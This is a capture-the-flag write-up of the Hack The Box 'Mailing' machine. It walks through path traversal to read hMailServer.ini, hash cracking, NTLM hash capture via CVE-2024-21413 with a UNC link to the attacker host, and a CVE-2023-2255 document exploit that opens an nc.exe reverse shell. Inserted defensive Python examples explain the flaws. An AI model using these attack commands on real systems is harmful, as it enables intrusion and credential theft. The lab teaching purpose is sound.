HTB - Mailing


Last updated 8 months ago

Machine Description

Mailing is an easy Windows machine that runs hMailServer and hosts a website vulnerable to Path Traversal. This vulnerability can be exploited to access the hMailServer configuration file, revealing the Administrator password hash. Cracking this hash provides the Administrator password for the email account. We leverage CVE-2024-21413 in the Windows Mail application on the remote host to capture the NTLM hash for user maya. We can then crack this hash to obtain the password and log in as user maya via WinRM. For privilege escalation, we exploit CVE-2023-2255 in LibreOffice.

Enumeration


Scope

IP Address 10.10.11.14

Nmap Scan

  • From the machine name, I can guess that mail services are running on it, so I'll scan the well-known mail ports first

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ nmap -p25,110,143,465,993,995 $ip  -Pn 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-27 18:48 EDT
Nmap scan report for 10.10.11.14
Host is up (0.45s latency).

PORT    STATE    SERVICE
25/tcp  open     smtp
110/tcp open     pop3
143/tcp open     imap
465/tcp open     smtps
993/tcp open     imaps
995/tcp filtered pop3s

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ nmap -p5985,5986 $ip -Pn                                          

PORT     STATE    SERVICE
5985/tcp open     wsman

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ nmap -F $ip -Pn         

25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
135/tcp open  msrpc
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
465/tcp open  smtps
587/tcp open  submission
993/tcp open  imaps

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ nmap -p- --min-rate 10000 $ip -Pn -v -oN all_ports_scan

PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
465/tcp   open  smtps
587/tcp   open  submission
993/tcp   open  imaps
5040/tcp  open  unknown
5985/tcp  open  wsman
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
57845/tcp open  unknown
* Open ports: 25, 80, 110, 143, 445, 139, 465, 587, 993
* UDP open ports: none
* Services: smtp - http - imap - pop3 - rpc - smb - imaps - smtps - winRM
* Versions: hMailServer smtpd - IIS httpd 10.0 - hMailServer pop3d
* Important notes: no Kerberos or LDAP, so there is no AD
* 5040/tcp  open  unknown
* 7680/tcp  open  pando-pub?

HTTP Enumeration

I tried subdomain enumeration, but got no results:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip -H "Host: FUZZ.mailing.htb" -t 200 -fs 4681

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

:: Progress: [19966/19966] :: Job [1/1] :: 34 req/sec :: Duration: [0:07:32] :: Errors: 0 ::

http://mailing.htb

Possible Username

Hovering over the Download Instructions button, the link takes a file name as a parameter, which looks like LFI.

I opened Burp, intercepted the request and changed the file name to include \Windows\System32\drivers\etc\hosts, and I got a hit.

I also tried to include download.php to see what that file does, and found the folder path we are in: C:\wwwroot\instructions\
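To show why the request above escapes the web root and how the handler should have been written, here is an added Python example (not code from the box or from the author): it models a download handler rooted at C:\wwwroot\instructions, the path found above. `vulnerable_resolve` reproduces the flaw and `safe_resolve` rejects anything that normalises to a location outside the root. The function names, the pure-Python Windows path normaliser and the sample inputs are my own assumptions; nothing touches the filesystem, so it runs on any host.

```python
from pathlib import PureWindowsPath
from urllib.parse import unquote_plus

# Web root the writeup found by including download.php itself
WEB_ROOT = PureWindowsPath(r"C:\wwwroot\instructions")


def normalise(path: str) -> PureWindowsPath:
    """Lexically collapse '.' and '..' in a Windows path, the way the OS does
    when it opens the file. Pure string handling: no filesystem access."""
    p = PureWindowsPath(path)
    components = p.parts[1:] if p.anchor else p.parts  # parts[0] is the drive anchor, e.g. 'C:\\'
    parts = []
    for part in components:
        if part in ("", "."):
            continue
        if part == "..":
            if parts:  # '..' at the drive root stays at the root, as on Windows
                parts.pop()
            continue
        parts.append(part)
    return PureWindowsPath(p.anchor, *parts)


def vulnerable_resolve(file_param: str) -> str:
    """Reproduces the flaw: the decoded parameter is appended to the web root
    and handed to the OS, so '..\\' sequences walk out of C:\\wwwroot\\instructions."""
    requested = unquote_plus(file_param)  # '+' decodes to a space, as in the URL above
    return str(normalise(str(WEB_ROOT / requested)))


def safe_resolve(file_param: str) -> str:
    """Hardened version: resolve first, then insist the result is strictly
    inside the web root. Absolute paths, drive-relative paths and '..' escapes
    all fail the containment check."""
    requested = unquote_plus(file_param)
    resolved = normalise(str(WEB_ROOT / requested))
    if WEB_ROOT not in resolved.parents:
        raise PermissionError(f"path traversal rejected: {file_param!r}")
    return str(resolved)


if __name__ == "__main__":
    # Constructed inputs: a legitimate download and the config-file request from the writeup
    for name in ("instructions.pdf",
                 r"..\..\..\Program+Files+(x86)\hMailServer\bin\hMailServer.ini"):
        print("vulnerable ->", vulnerable_resolve(name))
        try:
            print("safe       ->", safe_resolve(name))
        except PermissionError as exc:
            print("safe       ->", exc)
```

The containment check is done on the resolved path, not on the raw parameter: filtering the string for `..` is the approach that gets bypassed by encoding tricks, whereas checking that the final path still has the web root as a parent holds no matter how the input was spelled.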

RPC & SMB Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ smbclient -N -L //$ip           
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ enum4linux $ip
[E] Can't find workgroup/domain

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB         10.10.11.14     445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14     445    MAILING          [-] MAILING\: STATUS_ACCESS_DENIED
SMB         10.10.11.14     445    MAILING          [-] Error enumerating shares: Error occurs while reading from remote(104) 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ crackmapexec smb $ip -u guest -p guest --shares                                          
SMB         10.10.11.14     445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14     445    MAILING          [-] MAILING\guest:guest STATUS_LOGON_FAILURE  

SMTP & IMAP & POP3

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ openssl s_client -connect $ip:imaps

[.. snip ..]
depth=0 C=EU, ST=EU\Spain, L=Madrid, O=Mailing Ltd, OU=MAILING, CN=mailing.htb, emailAddress=ruy@mailing.htb

[.. snip ..]
  • Got an email address: ruy@mailing.htb

  • After installing the server locally and reading the docs, I got the installation path and the settings file name: ..\..\..\Program+Files+(x86)\hMailServer\bin\hMailServer.ini

AdministratorPassword=841bb5acfa6779ae432xxxxxxxxxxx
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c

Fire up hashid to identify the hash type and the matching hashcat attack mode


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ hashid -m 841bb5acfa6779ae4xxxxxxxxxxxxxxx                                    
Analyzing '841bb5acfa6779ae432fdxxxxxxxxxxxxxx'
[+] MD2 
[+] MD5 [Hashcat Mode: 0]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ hashcat -m 0 841bb5acfa6779ae432fd7a4e6600ba7 /usr/share/wordlists/rockyou.txt

841bb5acfa6779ae432fdxxxxxxxxxxx7:homenetworkingxxxxxxxxxxxxxxxx

Session..........: hashcat
Status...........: Cracked

I managed to crack one hash but not the other.

So, here we have credentials for the SMTP server: administrator:homenetworkingxxxxxxxxxxr. I'll fire up Thunderbird and connect to the server.

SUCCESS :)

I got a hint about a vulnerability that enables me to get users' hashes; here is the link:

Try sending emails to the three usernames found (ruy, maya, etc.); one of them would work.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ python3 /opt/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/CVE-2024-21413.py --server $ip --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.16.31\file.txt' --subject "Looks pretty"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ sudo responder -I tun0

[.. snip ..]

[SMB] NTLMv2-SSP Client   : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash     : maya::MAILING:584ad9a037446ce[.. snip ..]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

MAYA::MAILING:584ad9a037446ce1:ac7290481500283f8bf4c205b1468f7e:[.. snip ..]:m4y4nxxxxx
Session..........: hashcat
Status...........: Cracked
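As a defensive counterpart to the message sent above, here is an added Python example (my own, not from the page or from the xaitax project) that scans an email for links to UNC paths or file:// URLs and flags any that point at a host outside an allowlist, or at an IP literal. A client opening a path to an IP literal does not use Kerberos and falls back to NTLM, which is exactly the authentication Responder was waiting for. The sample messages, the allowlist and the function names are constructed for the example.

```python
import ipaddress
import re
from email import message_from_string

# Constructed allowlist: file servers users are expected to reach by UNC path
TRUSTED_FILE_SERVERS = {"fileserver.mailing.htb"}

# Matches '\\host\share...' and 'file://host/...' (also 'file:///\\host\...') and captures the host
UNC_RE = re.compile(r"(?:file:/{2,}\\*|\\\\)([A-Za-z0-9.\-_]+)[\\/]")


def find_unc_hosts(text: str) -> list[str]:
    """Return every host named by a UNC path or file:// URL in the text, in order."""
    return UNC_RE.findall(text)


def classify_host(host: str) -> list[str]:
    """Reasons to flag the host; an empty list means the link looks legitimate."""
    reasons = []
    if host.lower() not in TRUSTED_FILE_SERVERS:
        reasons.append("host not in the file-server allowlist")
    try:
        ipaddress.ip_address(host)
        reasons.append("IP literal: the client falls back to NTLM, so whoever "
                       "answers on 445 receives a NetNTLMv2 response to crack or relay")
    except ValueError:
        pass  # a hostname, not an IP literal
    return reasons


def scan_message(raw: str) -> list[tuple[str, list[str]]]:
    """Parse an RFC 822 message, inspect every text part, and return
    (host, reasons) for each flagged UNC/file:// link."""
    msg = message_from_string(raw)
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        charset = part.get_content_charset() or "utf-8"
        body = part.get_payload(decode=True).decode(charset, "replace")
        for host in find_unc_hosts(body):
            reasons = classify_host(host)
            if reasons:
                findings.append((host, reasons))
    return findings


# Constructed sample resembling the message sent above: the link target is a UNC path to the attacker box
SUSPICIOUS_MAIL = """From: administrator@mailing.htb
To: maya@mailing.htb
Subject: Looks pretty
Content-Type: text/html; charset=utf-8

<html><body><a href="\\\\10.10.16.31\\file.txt">Looks pretty</a></body></html>
"""

# Constructed benign sample: a UNC link to the allowlisted internal file server
BENIGN_MAIL = """From: ruy@mailing.htb
To: maya@mailing.htb
Subject: Policy document
Content-Type: text/plain; charset=utf-8

Please review \\\\fileserver.mailing.htb\\docs\\policy.pdf before Friday.
"""

if __name__ == "__main__":
    for label, mail in (("suspicious", SUSPICIOUS_MAIL), ("benign", BENIGN_MAIL)):
        print(label, scan_message(mail))
```

Flagging the link at the mail gateway is only half of the mitigation; the other half is not letting the workstation reach port 445 on arbitrary hosts in the first place, so that even an opened link produces a failed connection rather than the Responder capture shown above.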

Shell as Maya

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mailing]
└─$ evil-winrm -i $ip -u maya -p m4y4nxxxxx
Evil-WinRM shell v3.5

*Evil-WinRM* PS C:\Users\maya\Documents> 

*Evil-WinRM* PS C:\Users\maya\Desktop> type user.txt
e5e110f97bdfbee7f1xxxxxxxxxxxxxx

User flag e5e110f97bdfbee7f1xxxxxxxxxxxxxx


Shell as localadmin

Looking at the installed programs, there is an odd one.

*Evil-WinRM* PS C:\program files\libreoffice> cat readmes\readme_es.txt
======================================================================
Léame de LibreOffice 7.4
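Because the fix for CVE-2023-2255 shipped in point releases, the major.minor shown in the readme above is not enough on its own to decide whether the install is patched. The following added Python example (mine, not from the page) checks version strings, whether inventory lines or that readme heading, against the fixed releases, which I assume from the LibreOffice security advisory to be 7.4.7 and 7.5.3; the inventory lines are constructed.

```python
import re

# Fixed releases for CVE-2023-2255, assumed here from the LibreOffice security
# advisory (7.4.7 and 7.5.3); verify against the advisory before relying on it.
FIXED_IN = {(7, 4): (7, 4, 7), (7, 5): (7, 5, 3)}
FIRST_FIXED_BRANCH = (7, 4)   # branches older than this never received the fix


def parse_version(text: str):
    """Pull the first x.y[.z] version out of free text; returns a 3-tuple or None."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return tuple(int(x) for x in m.groups(default="0"))


def libreoffice_affected(version_text: str) -> bool:
    """True when the version is below the fixed release for its branch.
    A bare '7.4' parses as 7.4.0 and is therefore reported as affected, which is
    the conservative reading: the readme alone cannot prove the fix is present."""
    version = parse_version(version_text)
    if version is None:
        raise ValueError(f"no version in {version_text!r}")
    branch = version[:2]
    if branch in FIXED_IN:
        return version < FIXED_IN[branch]
    return branch < FIRST_FIXED_BRANCH   # 7.6+ carries the fix; 7.3 and older do not


def check_inventory(lines):
    """Return the inventory lines naming an affected LibreOffice build."""
    return [line for line in lines
            if "libreoffice" in line.lower() and libreoffice_affected(line)]


# Constructed inventory lines in the style of a software list, plus the readme heading seen above
SAMPLE_INVENTORY = [
    "Léame de LibreOffice 7.4",
    "LibreOffice 7.4.7.2",
    "LibreOffice 7.5.2.1",
    "hMailServer 5.6.7",
]

if __name__ == "__main__":
    for line in check_inventory(SAMPLE_INVENTORY):
        print("AFFECTED:", line)
```

On a real host, feed it the product version reported by the installer or the package database rather than the readme: the readme only names the branch, so the check above deliberately treats "7.4" as unpatched until a full version proves otherwise.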

┌──(kali㉿kali)-[~/…/HTB/machines/Mailing/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\nc.exe 10.10.16.31 443 -e cmd' --output "exploit.odt"

*Evil-WinRM* PS C:\Important Documents> upload exploit.odt
*Evil-WinRM* PS C:\Important Documents> upload nc.exe
┌──(kali㉿kali)-[~/…/HTB/machines/Mailing/CVE-2023-2255]
└─$ rlwrap nc -lvnp 443

listening on [any] 443 ...
connect to [10.10.16.31] from (UNKNOWN) [10.10.11.14] 53112

(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice\program>whoami                                                                        
mailing\localadmin      

Root flag: 499f2a971e0cb91baab16e344692dc9a

CVE-2024-21413
CVE-2023-2255
GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability